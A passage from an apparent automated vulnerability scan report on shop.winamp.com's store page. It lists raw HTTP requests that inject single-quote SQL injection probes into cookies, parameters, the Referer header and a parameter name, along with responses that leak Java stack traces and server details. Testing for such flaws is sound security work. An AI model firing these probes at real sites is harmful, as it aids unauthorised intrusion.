       return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_DocumentTitle) + '&resource_title_encoded=' + encoded;
   }
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.UserAgent007 =
{
   versionHigh            : 16,
   flashVersion        : 0,
   resolution            : '0x0',
   detectFlashVersion    : function ()
   {
       var ua = navigator.userAgent.toLowerCase();
       if (navigator.plugins && nav
...[SNIP]...

1.15. http://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Remediation detail

There is probably no need to perform a second URL-decode of the value of the BIGipServerp-drh-dc1pod5-pool1-active cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000%2527; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=127409894031,0)
Date: Sun, 27 Feb 2011 17:47:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 24204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>javax.servlet.ServletException: Required Page Parameter: productID not provided
   at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283)
   at com.digitalriver.system.controller.Siteflo
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000%2527%2527; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=127409894267,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:25 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.16. http://shop.winamp.com/store [JSESSIONID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF'; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=127409868347,0)
Date: Sun, 27 Feb 2011 17:47:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 24204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>javax.servlet.ServletException: Required Page Parameter: productID not provided
   at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283)
   at com.digitalriver.system.controller.Siteflo
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF''; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=127409869490,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.17. http://shop.winamp.com/store [Locale parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Locale request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US%2527&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101639964458,0)
Date: Sun, 27 Feb 2011 17:45:22 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 23783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>com.digitalriver.exception.TrackedSystemException: SIT_000001
   at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:389)
   at com.digitalriver.system.controller.SiteflowPlugin.handleRequest(
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US%2527%2527&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=101639965117,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:45:22 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.18. http://shop.winamp.com/store [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704891155,0)
Date: Sun, 27 Feb 2011 17:47:54 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 32916


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>com.digitalriver.exception.TrackedSystemException: REQ_000002
   at com.digitalriver.catalog.rules.AddItemToRequisition.doWork(AddItemToRequisition.java:287)
   at com.digitalriver.rules.ActionRule.evaluate(ActionRule.java:41)
   at
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=110230053450,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:55 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.19. http://shop.winamp.com/store [ThemeID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300'&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=105934960573,0)
Date: Sun, 27 Feb 2011 17:45:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 23801


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ThemeID=1279300%27&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>com.digitalriver.exception.TrackedSystemException: SIT_000001
   at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:389)
   at com.digitalriver.system.controller.SiteflowPlugin.handleRequest(
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300''&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300%27%27&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=105934961726,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:45:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.20. http://shop.winamp.com/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500&1'=1 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704877618,0)
Date: Sun, 27 Feb 2011 17:47:41 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 41391


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
:include src="/store?1'=1&Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>com.digitalriver.exception.TrackedSystemException: SIT_000002
   at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:516)
   at com.digitalriver.system.controller.SiteflowPlugin.handleRequest(
...[SNIP]...
.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:690)
   at java.lang.Thread.run(Thread.java:619)
Caused by: com.digitalriver.rules.EvaluationException: java.lang.NullPointerException
Failed expression:product.getAllVariations()
   at com.digitalriver.rules.MethodInvocation.evaluate(MethodInvocation.java:190)
   at com.digitalriver.rules.MethodInvocation.evaluate(MethodInvocation.java:165)

...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500&1''=1 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?1''=1&Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=131704878770,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:41 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.21. http://shop.winamp.com/store [productID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Remediation detail

There is probably no need to perform a second URL-decode of the value of the productID request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500%2527 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
